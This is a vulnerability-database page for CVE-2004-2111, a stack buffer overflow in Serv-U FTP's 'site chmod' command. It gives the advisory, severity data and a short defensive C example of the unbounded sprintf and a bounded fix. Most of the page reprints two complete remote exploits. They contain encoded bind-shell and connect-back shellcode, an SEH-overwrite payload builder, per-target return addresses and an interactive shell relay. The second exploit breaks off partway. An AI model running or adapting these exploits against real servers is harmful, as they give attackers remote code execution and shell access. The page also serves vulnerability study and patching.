CVE-2004-2111
CVSS 8.5
Published: 2004-12-31 00:00:00
Revised: 2016-10-17 23:06:24

[Original] Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.


[CNNVD] Serv-U FTP Server SITE CHMOD command overlong filename remote overflow vulnerability (CNNVD-200412-440)

        Serv-U is a widely used FTP server for the Windows platform.
        When Serv-U handles the "site chmod" command, an overlong filename argument overflows a stack buffer; a remote attacker can use this to execute arbitrary code with the privileges of the Serv-U process.
        When asked to chmod a file that does not exist, Serv-U replies with a message telling the user that the file or directory does not exist. That message is built with code similar to:
        sprintf(dst, "%s: No such file or directory.", filename);
        The variable dst is 256 bytes long, so an overlong filename crashes Serv-U (the exploits below turn that crash into code execution by overwriting the SEH record on the stack).
        Successful exploitation requires a valid Serv-U login account and a writable directory.

        Vendor patch:
        RhinoSoft
        ---------
        The vendor has fixed this issue in version 5.0 and later; download it from the vendor's homepage:

        http://www.serv-u.com/
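The unbounded sprintf the description refers to, next to a bounded replacement. This is an added example, not Serv-U's code: the 256-byte dst and the message text come from the description above; the function names, the boundary arithmetic and the hardened variant are this page's own additions.

```c
#include <stdio.h>
#include <string.h>

#define DST_LEN 256                 /* size of dst in the description */
static const char SUFFIX[] = ": No such file or directory.";

/* The pattern the description gives: unbounded sprintf of an attacker-
 * controlled name into a fixed stack buffer.  Kept for contrast only; the
 * self-checks below never feed it an overlong name, since that is the bug. */
void build_reply_vulnerable(char *dst, const char *filename)
{
    sprintf(dst, "%s: No such file or directory.", filename);
}

/* Bytes the vulnerable builder writes, terminating NUL included. */
size_t reply_bytes_needed(const char *filename)
{
    return strlen(filename) + strlen(SUFFIX) + 1;
}

/* 1 if the vulnerable builder would write past a DST_LEN-byte buffer. */
int reply_would_overflow(const char *filename)
{
    return reply_bytes_needed(filename) > DST_LEN;
}

/* Longest filename the buffer can hold: 256 - 28 - 1 = 227. */
size_t max_safe_filename_len(void)
{
    return DST_LEN - strlen(SUFFIX) - 1;
}

/* Hardened builder: bounded write, and an explicit error instead of a
 * silently truncated reply.  Returns the reply length, or -1 if the name
 * does not fit (dst is then an empty string). */
int build_reply_safe(char *dst, size_t dstlen, const char *filename)
{
    int n = snprintf(dst, dstlen, "%s%s", filename, SUFFIX);
    if (n < 0 || (size_t)n >= dstlen) {
        if (dstlen) dst[0] = '\0';
        return -1;
    }
    return n;
}

/* 1 if the boundary is exactly where the arithmetic says: a 227-byte name
 * fits and a 228-byte name overflows. */
int boundary_check(void)
{
    char name[300];
    memset(name, 'A', sizeof name);
    name[227] = '\0';
    int fits = !reply_would_overflow(name);
    name[227] = 'A';
    name[228] = '\0';
    return fits && reply_would_overflow(name);
}

/* Hardened builder on a 600-byte name: returns -1, nothing written. */
int safe_builder_on_long_name(void)
{
    char dst[DST_LEN], name[600];
    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    return build_reply_safe(dst, sizeof dst, name);
}

/* Hardened builder on "foo": returns 31 with the expected text, else -99. */
int safe_builder_on_foo(void)
{
    char dst[DST_LEN];
    int n = build_reply_safe(dst, sizeof dst, "foo");
    return strcmp(dst, "foo: No such file or directory.") == 0 ? n : -99;
}

int main(void)
{
    char dst[DST_LEN];
    build_reply_vulnerable(dst, "foo");      /* safe only because "foo" is short */
    printf("vulnerable builder, short name: %s\n", dst);
    printf("max safe filename length: %zu\n", max_safe_filename_len());
    printf("boundary check: %d\n", boundary_check());
    printf("safe builder on 600 x 'A': %d\n", safe_builder_on_long_name());
    printf("safe builder on \"foo\": %d\n", safe_builder_on_foo());
    return 0;
}
```

The hardened version refuses rather than truncates: a truncated "550" reply is harmless, but refusing makes the length limit visible in logs, and the 227-byte ceiling is exactly the number a reviewer would want to compare against the exploits' padding lengths further down.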
        

- CVSS (base score)

CVSS score: 8.5 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in total shutdown of the system]
Access complexity: MEDIUM [exploitation requires certain access conditions]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: SINGLE_INSTANCE [one authenticated session is required]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:serv-u:serv-u:3.1.0.1    Serv-U 3.1.0.1
cpe:/a:serv-u:serv-u:3.1.0.0    Serv-U 3.1.0.0
cpe:/a:serv-u:serv-u:3.0.0.16   Serv-U 3.0.0.16
cpe:/a:serv-u:serv-u:3.0.0.17   Serv-U 3.0.0.17
cpe:/a:serv-u:serv-u:4.0.0.4    Serv-U 4.0.0.4
cpe:/a:serv-u:serv-u:4.1.0.0    Serv-U 4.1.0.0
cpe:/a:serv-u:serv-u:4.1.0.3    Serv-U 4.1.0.3
cpe:/a:serv-u:serv-u:3.1.0.3    Serv-U 3.1.0.3

- OVAL (technical details for detection)

No matching OVAL definition found.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2111
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2111
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-440
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2004-01/0249.html
(UNKNOWN)  BUGTRAQ  20040124 [SST]ServU MDTM command remote buffero verflow adv
http://marc.info/?l=bugtraq&m=107513654005840&w=2
(UNKNOWN)  BUGTRAQ  20040126 Serv-U ftp 4.2 site chmod long_file_name exploit
http://securitytracker.com/id?1008841
(UNKNOWN)  SECTRACK  1008841
http://www.securityfocus.com/bid/9483
(UNKNOWN)  BID  9483
http://www.securityfocus.com/bid/9675
(UNKNOWN)  BID  9675
http://xforce.iss.net/xforce/xfdb/14931
(UNKNOWN)  XF  servu-chmodcommand-execute-code(14931)

- Vulnerability information

Serv-U FTP Server SITE CHMOD command overlong filename remote overflow vulnerability
High severity; boundary condition error
2004-12-31 00:00:00 2010-04-27 00:00:00
Remote

- Advisories and patches

        

- Vulnerability information (149)

Serv-U FTPD 3.x/4.x "SITE CHMOD" Command Remote Exploit (EDBID:149)
windows remote
2004-01-27 Verified
Port: 21  Author: lion
/*
*-----------------------------------------------------------------------
* 
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author   : lion
*          : lion@cnhonker.net
*          : http://www.cnhonker.com
* Date     : 2004-01-25
*          : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested   : Windows 2000 Server EN/GB
*          :	 + Serv-U v3.0.0.20~v4.1.0.11
* Notice   : *** Bug find by kkqq kkqq@0x557.org ***
*          : *** You need a valid account and a writable directory. ***
* Compile  : cl Servu.c
* Usage    : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <io.h>		// read()/write() used by shell()

#pragma comment(lib, "ws2_32")

// for bind shellcode
#define BIND_OFFSET		91

// for connectback shellcode
#define PORT_OFFSET		95
#define IP_OFFSET		88

#define SEH_OFFSET		0x193	//v3.0.0.20~v4.1.0.11
//#define	SEH_OFFSET		0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN			2048
#define JMP_OVER		"\xeb\x06\xeb\x06"
#define	VERSION			"1.0"

struct
{
	DWORD	dwJMP;
	char	*szDescription;
}targets[] =
{
	{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K/XP  ALL"},	//for all GB win2000 and winxp
// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K     SP3/SP4"},	//wsock32.dll jmp ebx addr
// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11  GB     XP     SP0/SP1"},	//wsock32.dll jmp ebx addr
// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11  GB/BG  2K     SP4"},	//user32.dll jmp ebx addr
// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K/XP  ALL"},	//for all BG win2000 and winxp	
// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K     SP4"},	//setupapi.dll jmp ebx addr
// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11  KR     2K     SP4"},	//setupapi.dll jmp ebx addr
// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11  EN     2K     SP4"},	//setupapi.dll jmp ebx addr
// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11  EN     XP     SP1"},
// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},         
},v;


unsigned char	*szSend[4];
unsigned char	szCommand[MAX_LEN];
char		szDirectory[0x100];

// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion"; 

// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n"; 

// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";

// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";

void usage(char *p)
{
	int	i;
	printf( "Usage:\t%s\t<-i ip> <-t type>\n"
		"\t\t[-u user] [-p pass] [-d dir]\n"
		"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
		"[type]:\n" , p);	
	for(i=0;i<sizeof(targets)/sizeof(v);i++)
	{
		printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
	}
}

/* ripped from TESO code and modified by ey4s for win32 */
void shell (int sock)
{
	int     l;
	char    buf[512];
	struct	timeval time;
	unsigned long	ul[2];

	time.tv_sec = 1;
	time.tv_usec = 0;

	while (1)
	{
		ul[0] = 1;
		ul[1] = sock;

		l = select (0, (fd_set *)&ul, NULL, NULL, &time);
		if(l == 1)
		{
			l = recv (sock, buf, sizeof (buf), 0);
			if (l <= 0)
			{
				printf ("[-] Connection closed.\n");
				return;
			}
			l = write (1, buf, l);
			if (l <= 0)
			{
				printf ("[-] Connection closed.\n");
				return;
			}
		}
		else
		{
			l = read (0, buf, sizeof (buf));
			if (l <= 0)
			{
				printf("[-] Connection closed.\n");
				return;
			}
			l = send(sock, buf, l, 0);
			if (l <= 0)
			{
				printf("[-] Connection closed.\n");
				return;
			}
		}
	}
}

void main(int argc, char **argv)
{
	struct	sockaddr_in sa, server, client;
	WSADATA	wsd;
	SOCKET	s=INVALID_SOCKET, s2=INVALID_SOCKET, s3=INVALID_SOCKET;	// so __finally closes only what was opened
	int	iErr, ret, len;
	char	szRecvBuff[MAX_LEN];
	int	i, j, iType=-1;	// -1: no "-t" given, rejected by the range check below
	int	iPort=21;
	char	*ip=NULL, *pUser="ftp", *pPass="ftp@ftp.com", *cbHost=NULL;
	char	user[128], pass[128];
	BOOL	bCb=FALSE, bLocal=TRUE;
	unsigned short	shport=53, shport2=0;
	unsigned long	cbip;
	unsigned int	timeout=5000, Reuse;
	char	penetrate[255],cbHost2[20];
	int seh_offset;
	
	printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
		"Bug find by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)\r\n"
		"Welcome to HUC website http://www.cnhonker.com\r\n\n"
		 	, VERSION);

	seh_offset = SEH_OFFSET;
	
	if(argc < 4)
	{
		usage(argv[0]);
		return;
	}

	for(i=1;i<argc;i+=2)
	{
		if(strlen(argv[i]) != 2)
		{
			usage(argv[0]);
			return;
		}
		// check parameter
		if(i == argc-1)
		{
			usage(argv[0]);
			return;
		}
		switch(argv[i][1])
		{
			case 'i':
				ip=argv[i+1];
				break;
			case 't':
				iType = atoi(argv[i+1]);
				break;
			case 'f':
				iPort=atoi(argv[i+1]);
				break;
			case 'p':
				pPass = argv[i+1];
				break;
			case 'u':
				pUser=argv[i+1];
				break;
			case 'c':
				cbHost=argv[i+1];
				bCb=TRUE;
				break;
			case 's':
				shport=atoi(argv[i+1]);
				break;
			case 'd':
				if(argv[i+1][0] != '/')
					strcpy(szDirectory, "/");
				strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
				
				if(szDirectory[strlen(szDirectory)-1] != '/')
					strcat(szDirectory, "/");
					
				// correct the directory len
				for(j=0;j<(strlen(szDirectory)-1)%8;j++)
					strcat(szDirectory, "x");
					
				//printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
				seh_offset = seh_offset - strlen(szDirectory)+1;
				break;
		}
	}

	if(!ip)	// user/pass have defaults; only the target ip is mandatory
	{
		usage(argv[0]);
		printf("[-] Invalid parameter.\n");
		return;
	}

	if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
	{
		usage(argv[0]);
		printf("[-] Invalid type.\n");
		return;
	}

	if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
	{
		usage(argv[0]);
		printf("[-] Invalid port.\n");
		return;
	}
	
	_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
	user[sizeof(user)-1]='\0';
	_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
	pass[sizeof(pass)-1]='\0';
	szSend[0] = user;	//user
	szSend[1] = pass;	//pass	
	szSend[2] = penetrate;	//penetrate
	szSend[3] = szCommand;	//shellcode
	
	// Penetrate through the firewall.
	if(bCb && shport > 1024)
	{
		strncpy(cbHost2, cbHost, sizeof(cbHost2)-1);
		cbHost2[sizeof(cbHost2)-1] = '\0';
		for(i=0;i<strlen(cbHost); i++)
		{
			if(cbHost[i] == '.')
				cbHost2[i] = ',';
		}
		
		sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);

		//printf("%s", penetrate);
	}
	else
	{
		sprintf(penetrate,"TYPE I\r\n");		
	}

	// fill the "site chmod" command
	strcpy(szCommand, "site chmod 777 ");
	
	// fill the directory
	if(szDirectory[0])
		strcat(szCommand, szDirectory);

	// fill the egg
	for(i=0;i<seh_offset%8;i++)
		strcat(szCommand, "\x90");
	//strcat(szCommand, "BBBB");
	
	// fill the seh
	for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
	{
		strcat(szCommand, JMP_OVER);
		memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
	}
		
	// fill the decode
	strcat(szCommand, decode);

	// fill the shellcode start	sign
	strcat(szCommand, sc_start);

	// fill the shellcode
	if(bCb)
	{
		// connectback shellcode
		shport2 = htons(shport)^(u_short)0x9393;
		cbip = inet_addr(cbHost)^0x93939393;
		memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
		memcpy(&cbsc[IP_OFFSET], &cbip, 4);
		strcat(szCommand, cbsc);		
	}
	else
	{
		// bind shellcode
		shport2 = htons(shport)^(u_short)0x9393;
		memcpy(&sc[BIND_OFFSET], &shport2, 2);
		strcat(szCommand, sc);
	}

	// fill the shellcode end sign
	strcat(szCommand, sc_end);

	// send end
	strcat(szCommand, "\r\n");

	if(strlen(szCommand) >= sizeof(szCommand))
	{
		printf("[-] stack buffer overflow.\n");
		return;
	}
	
//	printf("send size %d:%s", strlen(szCommand), szCommand);
	
	__try
	{
		if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
		{
			printf("[-] WSAStartup error:%d\n", WSAGetLastError());
			__leave;
		}

		s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
		if(s == INVALID_SOCKET)
		{
			printf("[-] Create socket failed:%d",GetLastError());
			__leave;
		}

		sa.sin_family=AF_INET;
		sa.sin_port=htons((USHORT)iPort);
		sa.sin_addr.S_un.S_addr=inet_addr(ip);

		setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
		iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
		if(iErr == SOCKET_ERROR)
		{
			printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
			__leave;
		}
		printf("[+] Connect to %s:%d success.\n", ip, iPort);
		
		if(bCb)
		{
			Sleep(500);
			s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

			server.sin_family=AF_INET;
			server.sin_addr.S_un.S_addr=inet_addr(cbHost);
			//server.sin_addr.s_addr=INADDR_ANY; 
			server.sin_port=htons((unsigned short)shport);

			setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));

			Reuse = 1; 
			setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));

			if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
			{
				printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
				printf("[-] You must run nc get the shell.\n");
				bLocal = FALSE;
				//closesocket(s2);
				//__leave;
			}
			else
			{	
				printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
				listen(s2, 1); 
			}
		}
		
		for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
		{
			memset(szRecvBuff, 0, sizeof(szRecvBuff));
			iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
			if(iErr == SOCKET_ERROR)
			{
				printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
				__leave;
			}
			printf("[+] Recv: %s", szRecvBuff);
			
			if(szRecvBuff[0] == '5')
			{
				printf("[-] Server return a error Message.\r\n");
				__leave;
			}

			iErr = send(s, szSend[i], strlen(szSend[i]),0);
			if(iErr == SOCKET_ERROR)
			{
				printf("[-] Send buffer error:%d.\n", WSAGetLastError());
				__leave;
			}

			if(i==sizeof(szSend)/sizeof(szSend[0])-1)
				printf("[+] Send shellcode %d bytes.\n", iErr);
			else
				printf("[+] Send: %s", szSend[i]);
		}

		printf("[+] If you don't have a shell it didn't work.\n");

		if(bCb)
		{
			if(bLocal)
			{
				printf("[+] Wait for shell...\n");
			
				len = sizeof(client);
				s3 = accept(s2, (struct sockaddr*)&client, &len); 
				if(s3 != INVALID_SOCKET) 
				{ 
					printf("[+] Exploit success! Good luck! :)\n");
					printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
					shell(s3);
				}
			}	
		}
		else
		{
			printf("[+] Connect to shell...\n");
			
			Sleep(1000);
			s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
			server.sin_family = AF_INET;
			server.sin_port = htons(shport);
			server.sin_addr.s_addr=inet_addr(ip);

			ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
			if(ret!=0)
			{
				printf("[-] Exploit seem failed.\n");
				__leave;
			}
			
			printf("[+] Exploit success! Good luck! :)\n");
			printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
			shell(s2);
		}
		
		
	}

 	__finally
	{
		if(s != INVALID_SOCKET) closesocket(s);
		if(s2 != INVALID_SOCKET) closesocket(s2);
		if(s3 != INVALID_SOCKET) closesocket(s3);
		WSACleanup();
	}

	return;
}

// milw0rm.com [2004-01-27]
		

- Vulnerability information (822)

Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit (EDBID:822)
windows remote
2004-01-30 Verified
Port: 21  Author: SkyLined
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define exploit_length      511
#define NOP 'A'

#define SEH_handler_offset  400
char* SEH_handler     = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b

char* shellcode = 
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
  "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
  "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
  "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
  "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
  "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
  "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
  "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
  "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";

int sock;
FILE* FILEsock;
int doubling;

void send_command(char *command, char *arguments) {
  int i;
  send(sock, command, strlen(command), 0);
  send(sock, " ", 1, 0);
  for (i=0; i<strlen(arguments); i++) {
    send(sock, arguments+i, 1, 0);
    if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
  }
  send(sock, "\x0a\x0d", 2, 0);
}

int main(int argc, char *argv[], char *envp[]) {
  struct sockaddr_in addr;
  char *outbuffer, inbuffer[256];
  char *retaddress = NULL;
  char *version = NULL;

  if (argc<5) {
    printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
    exit(-1);
  }

  printf("- Serv-ME ----------------------------------------------------\n"
         "  Serv-U v4.x \"site chmod\" exploit.\n"
         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
         "  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
         "  Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
         "  Greets to everyone at 0dd and #netric.\n"
         "  (K)(L)(F) for Suzan.\n"
         "\n"
         "  Binds a shell at %s:28876 if successful.\n"
         "  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
         "--------------------------------------------------------------\n",
           argv[1]);

  addr.sin_family = AF_INET;
  addr.sin_port = htons(atoi(argv[2]));
  addr.sin_addr.s_addr = inet_addr(argv[1]);

  printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("Socket creation failed");
    exit(-1);
  }
  if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
    perror("Connection failed");
    exit(-1);
  }
  FILEsock = fdopen(sock, "r");
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
    printf("[-] This is not a Serv-U v4.X ftp server.\n");
    exit(-1);
  }
  if (strstr(inbuffer, "v4.1") != NULL) {
    retaddress = retaddress_4103;
    version = "4.1.0.3";
  }

  printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
  send_command("USER", argv[3]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  send_command("PASS", argv[4]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "230") != inbuffer) {
    printf("[-] Login failed.\n");
    exit(-1);
  }

  if (argv[5]) {
    printf("\n[+] Changing directory...\n");
    send_command("CD", argv[5]);
    printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  }

